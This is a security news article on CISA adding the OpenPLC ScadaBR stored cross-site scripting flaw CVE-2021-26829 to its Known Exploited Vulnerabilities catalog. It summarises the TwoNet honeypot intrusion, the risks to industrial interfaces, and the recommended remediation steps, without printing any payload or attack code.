The CVE-2021-26829 vulnerability has been added to the U.S. Cybersecurity and Infrastructure Security Agency’s Known Exploited Vulnerabilities catalog following confirmed in the wild exploitation targeting industrial control systems. The flaw affects OpenPLC ScadaBR, a supervisory control and data acquisition platform used in education, industrial automation, energy environments, and small to mid sized SCADA deployments. According to CISA, the vulnerability has been actively leveraged by threat actors, prompting a government wide remediation deadline and renewed concern about attacks targeting critical infrastructure software.
CVE-2021-26829 is a stored cross site scripting vulnerability located in the system_settings.shtm component of affected OpenPLC ScadaBR installations. Both Windows versions up to 1.12.4 and Linux versions up to 0.9.1 are impacted. The vulnerability allows an attacker with access to administrative web panels or weakly protected interfaces to inject persistent JavaScript payloads that execute whenever a privileged user loads the tampered configuration interface. Exploitation can result in credential theft, session hijacking, modification of control logic parameters, or unauthorized interface manipulation that impacts the visibility and stability of industrial operations.
The decision by CISA to elevate CVE-2021-26829 to the KEV catalog follows evidence that real world attackers, including the pro Russian hacktivist collective TwoNet, have weaponized the flaw in recent incidents. TwoNet was observed exploiting the vulnerability against what they believed to be a Brazilian water treatment facility, not realizing the system was a honeypot operated by security researchers. The attackers obtained access through default credentials, created a new administrative user to maintain persistence, defaced the login page using the XSS flaw, and attempted to disable alarms and logs through interface manipulation. The activity demonstrates that even a mid severity XSS vulnerability can be operationally meaningful when it affects the human machine interface of an industrial system.
Background Of The CVE-2021-26829 Vulnerability
OpenPLC ScadaBR is a widely known open source SCADA platform used in industrial automation laboratories, energy grid training environments, building management systems, and small scale industrial deployments. While many large enterprises rely on proprietary SCADA technologies, ScadaBR remains common in smaller facilities that require cost effective human machine interface capabilities. The vulnerability added to CISA’s KEV catalog is a stored cross site scripting issue affecting legacy and current versions of the platform.
Stored XSS vulnerabilities differ from reflected XSS because the malicious payload is saved directly to the backend data store. This means the payload will trigger every time a user loads the affected page, not only when an attacker tricks a user into clicking a specially crafted link. In the case of ScadaBR, the vulnerable system_settings.shtm component is part of the configuration interface used by system administrators. This gives the attacker a leverage point that directly impacts sensitive control settings within a SCADA system.
The impact is compounded by the fact that many industrial facilities operate with poor segmentation, outdated versions of SCADA software, and shared credentials. In addition, internet exposed ScadaBR instances are still relatively common, many of which are discoverable through search engines like Shodan. These conditions make the vulnerability an attractive option for hacktivists, criminal threat groups, and opportunistic attackers whose goal is disruption rather than stealthy persistence.
Why CVE-2021-26829 Was Added To The CISA KEV Catalog
CISA’s Known Exploited Vulnerabilities catalog is reserved for vulnerabilities that have confirmed evidence of active exploitation and pose significant risk to federal networks. Although the CVSS score for CVE-2021-26829 is 5.4, the real world impact is driven by contextual factors such as the sensitivity of SCADA systems, the ease of exploitation, and the presence of unpatched installations operating critical functions.
In the observed incident involving TwoNet, attackers moved from initial access to disruptive action within approximately 26 hours. They did not escalate privileges through kernel level exploits. Instead, they used default credentials, simple enumeration, direct interface manipulation, and the XSS flaw to carry out visible changes in the human machine interface. This demonstrates that a SCADA compromise does not always require sophisticated malware or supply chain exploitation. Sometimes all that is necessary is weak configuration combined with a vulnerability like CVE-2021-26829.
The addition of the vulnerability to the KEV catalog imposes a mandatory remediation deadline of December 19, 2025, for federal agencies. While CISA cannot enforce requirements on private sector operators, they strongly encourage all organizations to patch affected ScadaBR installations or apply compensating controls as part of their vulnerability management process.
Technical Analysis Of CVE-2021-26829
The vulnerability exists because user supplied input in system_settings.shtm is not properly sanitized before being stored and rendered in the frontend template. When a privileged user views the settings interface, stored JavaScript executes in the browser, inheriting the privileges and session context of the victim.
Key technical risks include:
- Session hijacking through JavaScript based cookie theft
- Injection of malicious scripts that alter displayed system values
- Unauthorized manipulation of interface elements to hide operational changes
- Redirection to attacker controlled command and control endpoints
- Silent installation of backdoor accounts through abused API endpoints
In industrial environments, these actions can trigger significant consequences. If a malicious script alters displayed tank levels, temperature readings, pump states, or voltage indicators, physical processes may be impacted without operators realizing what is happening. This class of vulnerability is therefore classified as high risk despite its moderate CVSS score.
Real World Exploitation And Threat Actor Behavior
TwoNet, the threat actor associated with the recent exploitation, has evolved from a group performing distributed denial of service campaigns into a multifaceted operation with links to ransomware, hack for hire offerings, industrial system targeting, doxxing, and initial access brokerage. They frequently discuss their capabilities on Telegram, but the ScadaBR incident demonstrates that they have adopted realistic tactics that align with common attacker playbooks.
Their attack path in the honeypot incident included:
- Logging in with default credentials commonly found in unmaintained SCADA systems
- Creating a new user named Barlati to maintain persistence
- Using CVE-2021-26829 to deface the login page with an injected pop up message
- Attempting to disable alarms and logs through the interface
This pattern reflects a growing trend in which hacktivist groups adopt simple but effective tactics that disrupt visibility within industrial systems. The low barrier to entry and availability of publicly documented vulnerabilities make SCADA software a convenient target for threat actors seeking attention or political impact.
Industrial Impact And Infrastructure Risk
Although ScadaBR is not generally used in large scale military or national utilities, it is widely deployed in local energy systems, building control environments, small treatment facilities, academic labs, and private industrial operations. A compromise in any of these environments can lead to the loss of monitoring visibility, unsafe configuration changes, or opportunistic sabotage.
Many industrial systems use ScadaBR as part of test benches or training deployments that are connected to the wider network. These deployments can also serve as pivot points for lateral movement. If an attacker compromises a ScadaBR instance inside an industrial facility, they may be able to reach other devices including programmable logic controllers, historian databases, engineering workstations, or building management systems.
Why SCADA XSS Vulnerabilities Are More Dangerous Than Web XSS
Web based cross site scripting vulnerabilities are often perceived as low severity, but in SCADA systems the consequences can be operationally significant. When interface values represent physical processes, any manipulation can cause harm. A malicious payload delivered through CVE-2021-26829 can alter what operators see, hide alarms, or present false readings.
Unlike banking or e commerce interfaces, SCADA systems directly influence pumps, valves, actuators, and environmental controls. A single page manipulation can lead to delayed response times, unintended equipment states, or incorrect human decisions.
CISA And Industry Guidance For CVE-2021-26829
CISA urges all operators to apply available patches or remove affected systems from exposed networks. The recommendation aligns with the binding operational directive that mandates federal agencies to reduce exposure to known exploited vulnerabilities. Private sector operators should apply similar urgency due to the increasing frequency of industrial system targeting by criminal and hacktivist actors.
Organizations are encouraged to take the following steps:
- Update ScadaBR installations to versions that patch CVE-2021-26829
- Remove public internet exposure for SCADA interfaces whenever possible
- Implement strict network segmentation between SCADA and enterprise networks
- Enable logging and monitor for unauthorized configuration access
- Replace default credentials with strong unique passwords
Operators should also scan endpoints and workstations used to access SCADA consoles. Tools like Malwarebytes can detect malicious scripts, keyloggers, backdoors, or other unwanted programs that may have been installed after viewing a compromised interface. Because the vulnerability involves browser based execution, infected operator workstations could provide an attacker with access well beyond the SCADA console itself.
Wider Threat Landscape And Connected Activity
The addition of CVE-2021-26829 to the KEV catalog coincides with another trend identified by VulnCheck. Researchers reported a long running exploit operation driven by an Out of Band Application Security Testing endpoint hosted on Google Cloud. The operation has conducted over 1400 exploit attempts across 200 different CVEs, with a regional focus on Brazil. This activity shows how threat actors are using legitimate cloud infrastructure to blend their scanning operations into normal traffic patterns.
The infrastructure used in these exploit attempts links to subdomains under detectors testing dot com. Payloads include modified variants of public exploits such as Fastjson remote code execution, adapted into Java class files that accept commands and relay responses to attacker controlled URLs. While this activity is not directly tied to CVE-2021-26829, it highlights how industrial systems and public facing web applications are being probed simultaneously by threat actors using commodity tools and managed hosting providers.
Summary Of Affected Versions
- OpenPLC ScadaBR through 1.12.4 on Windows
- OpenPLC ScadaBR through 0.9.1 on Linux
Users of ScadaBR should verify their installation version and review configuration settings to confirm whether the system may already contain malicious stored scripts placed by attackers. Regular auditing of configuration pages, backups, templates, and custom scripts is recommended to ensure integrity.
